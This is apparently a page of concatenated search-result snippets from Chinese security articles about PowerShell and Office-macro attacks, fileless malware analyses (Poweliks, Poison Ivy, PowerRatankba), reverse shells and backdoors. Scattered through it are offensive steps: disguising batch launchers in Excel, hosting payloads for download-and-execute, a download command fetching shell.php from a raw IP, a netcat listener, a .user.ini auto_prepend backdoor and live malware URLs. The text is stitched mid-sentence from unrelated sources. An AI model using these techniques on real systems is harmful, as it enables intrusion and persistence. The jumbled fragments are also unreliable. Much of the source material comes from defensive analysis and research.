Poweliks在注册表里面创建的键值使用非ASCII字符作为键名,防止使用Windows注册表编辑器直接读取。如下图1: ? ? 我们使用注册表编辑器打开之后如下图: ?...可以看到注册表编辑器无法读取非ASCII的键名。...Poweliks行为特征: 1、利用Microsoft Word中的漏洞制作Word文件,然后通过电子邮件方式传播 2、创建一个隐藏的自启动注册表项 3、解码该启动项之后发现:代码中一部分会判断系统是否安装了...PowerShell,另外一部分是经过Base64编码的PowerShell脚本, 该脚本调用并执行攻击者定义的shellcode 4、shellcode会执行Windows二进制文件的payload...,该payload会查询机器硬编码的IP地址,以接受攻击者的进一步指令 5、以上所有的执行过程全部存储在注册表中,没有任何文件被创建 Poweliks是一个功能非常复杂的软件软件,它使用多个代码来隐藏自身
后来又有安全研究人员使用PowerShell脚本重写了dnscat2客户端dnscat2-powershell(https://github.com/lukebaggett/dnscat2-powershell...生成/tmp/macro 攻击代码后,新建一个word 创建宏,注意:需要开启宏或者用户手动启用宏。开启宏设置:“文件”-“选项”-“信任中心”,选择“启用所有宏” ?...为了增加迷惑性,可以将批处理文件插入到office文档中,现创建一个excel表格,在excel中“插入”-“对象”-“由文件创建” 处,插入launcher.bat文件,可更改文件名称和图标,进行伪装...将生成的test文件复制到python搭建的web服务器中,于是有:http://192.168.1.18:9889/test step 3:在目标机上执行powershell下载脚本 powershell...0x03 MSF反弹shell 3.1 使用regsvr32_applocker_bypass_server反弹shell 利用metasploit的web_delivery模块可通过python、php
) Windows中加载并执行PowerShell脚本 本地加载并执行PowerShell脚本 远程下载并执行PowerShell脚本 Windows中的批处理文件 Windows中快捷键操作 Windows...f http://114.118.80.138/shell.php c:/users/xie/desktop/shell.php #下载文件到指定目录下 但是该命令的使用会引发杀毒软件的查杀...中加载并执行PowerShell脚本 Windows PowerShell 是一种命令行外壳程序和脚本环境,使命令行用户和脚本编写者可以利用 .NET Framework的强大功能。...更多的关于PowerShell的用法:PowerShell使用浅析 本地加载并执行PowerShell脚本 在cmd当前目录下有PowerView.ps1脚本,并执行其中的Get-Netdomain模块...\powerview.ps1;Get-NetDomain 远程下载并执行PowerShell脚本 远程下载并执行test.ps1脚本、远程下载PowerView.ps1脚本,并执行其中的Get-Netdomain
该exploit会攻击由服务扩展创建的REST端点,我们只需要找出REST端点的名称即可利用该漏洞。 ?...通过目录枚举,我们发现 endpoint 为 /rest,用其替换exploit gobuster -q dir --url http://10.10.10.9 -t 50 --wordlist ..../word.txt ? ? 漏洞利用 php exp.php ? 没有反应,挂上 burpsuite 看看 ? ? 设置 exp 的target为 burp 的监听端口 ? ?...已知目标是 x64 的系统,我们上传 nc.exe 下载地址:https://eternallybored.org/misc/netcat/ 给 exp 添加一个文件上传功能,也可以使用 smb文件共享...脚本 http://10.10.10.9/cmd.php?
在这篇文章中,我将展示如何利用基于Empire的PowerShell来对Word文档进行“伪装”攻击,可能还有其它实现方法,我仅作个抛砖引玉。...创建Empire Listener 创建一个Empire Listener监听线程,可点此查看Empire的使用说明。...之后的转码脚本并另存为一个文件,然后把它部署于某个攻击需要用到的Web服务器中,用于受害主机稍后的请求下载。...该Web服务器可以是Apache之类的,但在这里,我用Python SimpleHTTPServer模块来快速启动一个Web服务,它会自动托管你启动命令目录内的文件,当然最好可以创建一个文件目录,然后通过终端...cd到其中进行文件生成(我这里是evil)和启动Web服务。
通过对数千个恶意代码的分析,获得了一些有趣的见解,例如:PowerShell使用的混淆处理方法的统计特征规律。此外,PowerDrive可以通过多层递归对PowerShell脚本进行去混淆处理。...例如,在污水攻击中,利用了宏与PowerShell构建了APT攻击,具体过程如下: (1)使用精心构造的钓鱼文档,诱使目标人员打开文档启用宏; (2)文档宏执行后,向文件系统写入脚本及编码过的PowerShell...文件; (3)加载脚本,解码PowerShell文件执行,与C&C进行通信。...我们以一个简单的例子对宏代码进行分析(样本文件附后[3]),这里启用宏后使用word中的开发功能VBA进行对宏代码的读取(也可使用oledump.py对宏代码进行提取)。...该用户再用模板创建word时候,此时模板来感染文档,将文档的宏代码替换为模板的宏代码,此时文档被感染。 2.当文档的宏感染模板时,加上了时间、日期、用户名、地址等内容在代码的最后。
>'); (6)写出文件名为”text.php”链接密码为“c”的webshell一句话木马到网站根目录下方 (7)还有其他的黑客是通过phpmyadmin登录弱口令密码的系统日志文件写入...,那么这就会非常的尴尬,但是我突然想起了之前我之前给广东省某市的网络执法机构做了一个用来记录黑客访问webshell一句话时候的IP地址的脚本,并且通过邮件或者微信把信息发送给执法人。...2.)将EXE反射性地加载到PowerShell进程中。 远程运行时无法将EXE输出返回给用户。如果需要远程输出,则必须使用DLL。如果在本地运行,则可以返回EXE输出。.../ 这里的江西赣州的黑客所使用的就是上图红圈选圈中的PowerShell脚本 然后查看他一下他的PowerShell脚本 其中$InputString是黑客把自己的恶意的二进制文件通过....开发人员应该尽量在生产环境中杜绝使用一键部署类型的软件和脚本防止软件留有后门,导致服务器病毒木马入侵 3.关注多一些风险预警平台”微步”/或者关注威胁情报收集的微信公众号”黑鸟“还有就是我的winway
我个人使用 Python HTTP 服务器的次数多于任何其他方法。当针对受害者时,我将在攻击者计算机上创建一个特定于我的目标主机的工作目录。然后我可以将用于特定漏洞利用的任何工具复制到该目录中。...此外,我还在攻击者计算机上保留了一个 Windows 漏洞利用文件夹,其中包含我使用的所有常见漏洞利用和 PowerShell 脚本。...例如,我使用的常见 PowerShell 脚本名为Invoke-PowerShellTcp.ps1,来自 Nishang 脚本集合。...PHP 上传脚本来设置上传文件的方法。...首先使用文本编辑器创建一个名为upload.php的脚本,然后将该脚本放置在/var/www/html中。 这是 upload.php 的脚本: <?
Powershell-C2 Matt Nelson制作了一个PowerShell 脚本(https://github.com/enigma0x3/Powershell-C2 ),该脚本使用相同的技术来获得...在这里我们使用Empire的Invoke-Shellcode.ps1来作为powershell木马文件: ?...之后修改当PowerShell-C2脚本中的Word以及DownloadString地址: ?...Matt Nelson还创建了一个Office 宏,它执行相同的技术,但另外创建了一个注册表项,每次用户登录时都会执行C2Code PowerShell脚本以保持持久性: ?...下面我们演示一下流程,首先使用Word新建一个Word文档,选择视图->宏->查看宏: ? 输入任意宏名称,之后点击“创建” ?
攻击者可通过EVAL执行lua代码,或通过数据备份功能往磁盘写入后门文件。 1....一旦攻击者可以在一台计算机上运行代码,他们便可以下载powershell脚本文件(.ps1)到磁盘执行,脚本可以在内存中运行(无文件化)。...后来又有安全研究人员使用PowerShell脚本重写了dnscat2客户端dnscat2-powershell(https://github.com/lukebaggett/dnscat2-powershell...,就可以看到反弹的shell 获取系统运行的进程 为了增加迷惑性,可以将批处理文件插入到office文档中,现创建一个excel表格,在excel中“插入”-“对象”-“由文件创建” 处,插入launcher.bat...0x03 MSF反弹shell 3.1 使用regsvr32_applocker_bypass_server反弹shell 利用metasploit的web_delivery模块可通过python、php
VBScript base 64解码代码 在多层循环解码base 64编码后,结果很明显的:附加于Word附件文档,隐藏在VBScript文件中,存在一个长且危险的脚本,随时可由Powershell执行...通过Unix环境,你可以创建这种PE,而不会有感染的风险。 下图就是他采用的过程: ? 图5....伪造的进程 userinit.exe 创建后被注入 他说,某些DLL的使用的组合“也显示了威胁的典型模式。 此外,MUTEX名称中标注的日期大多由Poison Ivy使用。...然后其他操作由恶意软件执行: 创建一个名为“Plug1.dat”的文件 为之后的工作创建一个套接字 通过 “HKEY_LOCAL_MACHINE\SYSTEM\Setup”查询PC信息 毫无疑问就是Poison...Poison IVY恶意软件是在PowerSploit使用shellcode创建或准备的恶意进程userinit.exe的过程中注入的。
近日从客户处捕获一枚邮件附件中的可疑word样本,以下是扫描结果,检测率貌似不高。 手动分析吧。...文件md5:0b16b255918264667a9f03e0b9f45167 1.攻击流程的第一步 打开该word样本没有给任何提示该就直接联网获取文件: windbg挂着找了半天,一直没发现这个链接动作是怎么触发的...powershell去访问https://longstop.club/Smileys/kina/dlnd.php并将返回的内容保存为%APPdATa%\kalat.exe并执行。...最后会下载到这个exe 5.攻击流程的第五步: fate.exe,会释放一个autoit脚本加载器和一个加密的autoit脚本,以及一些其他的文件,并调用加载器加载该autoit脚本。...Autoit脚本加载器是干净的官方版本,不会被杀,而加密的脚本本身不是可执行格式,因此也不会被杀,也就是这个文件释放出来的所有文件都不会被查杀,作者也是试图通过这种手段来免杀,不过效果看起来不太好,vt
随之而来的“好”处就是,**无法识别这些工具的使用是出于正常工作需要还是被用来执行恶意操作 0x02、无文件非恶意软件的使用 0x02.1、POWERSHELL 0x02.1.1、Powershell...) 0x02.1.2、使用 powershell 作为无文件非恶意软件的优点 除了满足上面三点无文件非恶意软件流行的原因,使用 powershell 作为无文件非恶意软件还有如下优点: 1) 、易于混淆...在 Word 和 Excel 中,可以通过创建和运行宏来自动执行常用任务。...能够轻松与网络钓鱼和社工技术相结合 0x02.4.3、宏被用于无文件非恶意软件的几个实例 1)、鱼叉攻击案例中大部分都是使用宏来执行恶意操作 2)、通过 OFFICE 文档进行网上诱骗 恶意宏还能够执行各种任务...实际一点的做法是使用 Powershell 提供的新日志记录功能分析脚本,并在可能的情况下对所需的脚本进行数字签名。但是这是一个很庞大的工作量,需要一个自动的脚本来实现。
,该配置项会让php文件在执行前先包含一个指定的文件,通过这个配置项,我们就可以来隐藏自己的后门。...①在目录下创建一个.user.ini文件,内容如下 auto_prepend_file=test.jpg ②然后再创建一个test.jpg文件,内容如下 <?...php if(@$_GET['shell']=='test'){ phpinfo(); }?> ③再创建一个正常的php文件 <?php echo ‘test123’; ?...Powershell权限维持 参考此Powershell脚本:https://github.com/re4lity/Schtasks-Backdoor 利用代码 ①在cmd中输入nc -lvp 9999...2、可能会遇到的问题 提示脚本无法运行 解决方法:输入set-ExecutionPolicy ALLSIGNED 选择Y 提示脚本无数字签名无法运行 解决方法:输入set-executionpolicy
命令,另据观察,攻击者通过使用TinyCC短链接服务来跳转和托管PowerSpritz攻击载荷。...,这些恶意CHM文件包括: 一个写得相当混乱的,用来创建浪漫意味网站的帮助指南文件 来自Orient Exchange Co交易公司名为ALCHAIN区块链技术的文档 开发首次代币发行平台(ICO)...下图为CHM文件中的PowerRatankba downloader VB脚本: 下图为用BITSAdmin工具通过HTTP获取Payload的方式: JavaScript Downloader...,保存为 C:\ Users\Public\Pictures\opt.vbs,然后通过hxxp://198.100.157[.]239/theme.gif,获取Powershell脚本,并保存为C:\Users...持久化文件appView.js中包含XOR编码的PowerShell脚本,用于从硬编码URL中检索Base64编码的PowerShell命令,如URL地址脚本hxxp://macintosh.linkpc
我在野外看到了各种恶意 LNK 文件。这些链接文件通常执行下载外部有效负载的脚本(Powershell、VBScript 等)。...我为自己设定了一个挑战,即创建一个嵌入了 EXE 文件的 LNK 文件,而无需外部下载。 这是通过创建一个 LNK 文件并在末尾附加 EXE 文件来实现的。...LNK 文件执行一些 Powershell 命令从 LNK 的末尾读取 EXE 的内容,将其复制到 %TEMP% 文件夹中的文件,然后执行。 我开发了一个从目标 EXE 文件创建 LNK 的程序。...通过在 Powershell 命令中存储原始 LNK 文件的长度(不包括附加的 EXE 数据)来解决此问题。 3.查看LNK文件的“属性”时可以看到Powershell命令。...通过使用 XOR 对 EXE 文件数据的每个字节进行“加密”和“解密”,这一点得到了改进 完整的 LNK 目标如下所示: cmd /c powershell -windowstyle hidden $lnkpath
它引入了许多非常有用的新概念,从而进一步扩展了您在 Windows 命令提示符和 Windows Script Host 环境中获得的知识和创建的脚本。...五.Powershell变量基础 五.Powershell变量基础 1.基础用法 Powershell变量跟PHP很类似,如下所示。 ? ? Powershell对大小写不敏感,a 和 A 一样。...六.Powershell调用脚本程序 1.脚本文件执行策略 首先,发现我们的脚本文件是禁止执行的。 ? ? 接着,我们尝试获取策略帮助信息。 ? ?...最后修改权限,让其能运行Powershell脚本文件。 ? 它会提示你需要启动管理员身份运行。 ? 通过管理员身份打开CMD,再设置其权限即可,设置完成之后可以调用相关的脚本程序。 ?...(3) 运行Powershell脚本文件也类似。 ? 运行结果如下图所示: ? ? 那么,如何在CMD中运行Powershell文件呢? 我们将demo.bat修改为如下内容,其中&表示运行。 ?
PowerShell版本的PowerSploit渗透测试框架的Persistence模块,可以模拟生成一个自动创建计划任务的后门脚本上传到目标后,导入脚本 Import-Module ....\Persistence.psm1 如下命令,使用计划任务的方式创建后门。...WMI型后门通常是用PowerShell扫描的可以直接从新的WMI属性中读取和执行后门代码、给代码能。通过这种方法,攻击者可以在系统中安装一个具有持久性的后门,且不会在系统中门外的任何文件。...file,可以上传木马文件 2 weevely后门 weevely是一款用Python语言编写的针对PHP平台的WebShell,主要功能有: 执行命令和浏览远程文件 检测常见的服务器配置问题 创建...:通过SUID和SGID查找文件 • audit_filesystem:用户进行错误权限审计的系统文件 • audit_etcpasswd:通过其它方式获取的密码 • shell_php:执行PHP命令
在某天我看到了如下的样本: ? app.any.run提示这是一个office宏的恶意文件,考虑到近年来,非PE的恶意文件已经越来越流行。故尝试将这个样本下载回来进行分析。...전문가 칼럼 원고 작성 양식.doc 创建时间和上传VT时间如下: ? 根据文件投放名称, 可以初步判断该样本是用于攻击朝鲜/韩国的恶意样本,光从文件名上暂时无法确定攻击目标。...思路1 通过vt查找 这个时候我们接着回到VT,可以看到如下的内容: ? 跟过来之后发现有成功请求之后保留的文件 ? 顺着这个文件hash,就可以找到目标powershell脚本了 ?...如果有vt下载权限,即可通过该hash将powershell脚本下载回来。...脚本首先定义了一些全局变量 根据定义的这些全局变量可以看出来 后续的通信地址应该是:”http://mybobo.mygamesonline.org/flower01/“ 用于接收上传信息的文件:“post.php
钓鱼攻击是网络犯罪团伙常用的一种手段,很多勒索病毒都曾使用邮件钓鱼的方式欺骗受害者打开相应的附件,运行恶意样本,导致受害者被勒索加密,钓鱼邮件攻击也是APT攻击的常用手段之一,如果收到陌生的邮件,千万不要随便点击附件链接或打开邮件附件中的文件...error.hta是一个vbs脚本,内嵌powershell脚本,如下所示: ? 运行hta脚本之后,调用执行内嵌的powershell脚本,如下所示: ?...与我们上面捕获到的数据流量包一致,PowerShell脚本通过远程服务器返回相应的操作指令,如下所示: ? CMD远程控制指令过程,如下所示: ?...通过CMD指令可以远程获取主机文件,进程等信息,下载,上传文件等操作,监控网络流量数据,如下所示: ?...,并进行远程控制的网络攻击行为,此次钓鱼邮件定向攻击同样采用”无文件”攻击手法,无落地PE文件,邮件附件中只包含一个HTA脚本文件,通过执行HTA脚本调用PowerShell执行所有的恶意操作 现在的钓鱼邮件攻击越来越多
领取专属 10元无门槛券
手把手带您无忧上云
